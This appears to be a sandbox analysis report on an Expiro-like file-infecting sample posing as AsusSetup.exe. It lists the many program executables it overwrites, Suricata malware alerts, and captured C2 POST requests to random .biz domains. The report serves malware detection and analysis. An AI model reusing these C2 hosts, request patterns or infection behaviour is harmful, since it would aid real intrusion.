Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
Source: C:\Users\user\Desktop\AsusSetup.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exeJump to behavior
Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:58296 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49733 -> 18.141.10.107:80
Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:53248 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49824 -> 34.211.97.45:80
Source: Network trafficSuricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.4:60487 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.4:50839 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.4:53838 -> 1.1.1.1:53
Queries random domain names (often used to prevent blacklisting and sinkholes)
Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
Source: unknownNetwork traffic detected: DNS query count 88
Source: Joe Sandbox ViewIP Address: 165.160.15.20 165.160.15.20
Source: Joe Sandbox ViewIP Address: 3.254.94.185 3.254.94.185
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.4:49733
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.4:49732
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.4:49738
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.4:49738
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.4:49732
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.4:49759
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.4:49759
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.4:49733
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.4:49764
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.4:49764
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.4:49753
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.4:49753
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.4:49752
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.4:49752
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.4:49787
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.4:49787
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.4:49765
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.4:49765
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.4:49850
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.4:49850
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.4:49873
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.4:49873
Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.4:49935
Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.4:49935
Source: global trafficHTTP traffic detected: POST /tqhhuuvd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 798
Source: global trafficHTTP traffic detected: POST /spoyvi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 798
Source: global trafficHTTP traffic detected: POST /fnkotvtiwfwjvbky HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /aay HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 798
Source: global trafficHTTP traffic detected: POST /ywrwbyxrs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 798
Source: global trafficHTTP traffic detected: POST /ils HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /beqepswmsyxa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /rdbyhsstwxr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /dbhv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /uyurjsjwfnxw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /qmxhsynps HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /saedqhwkiyelcofi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /wxhqgp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /lxjfxiwwkxywcqoq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
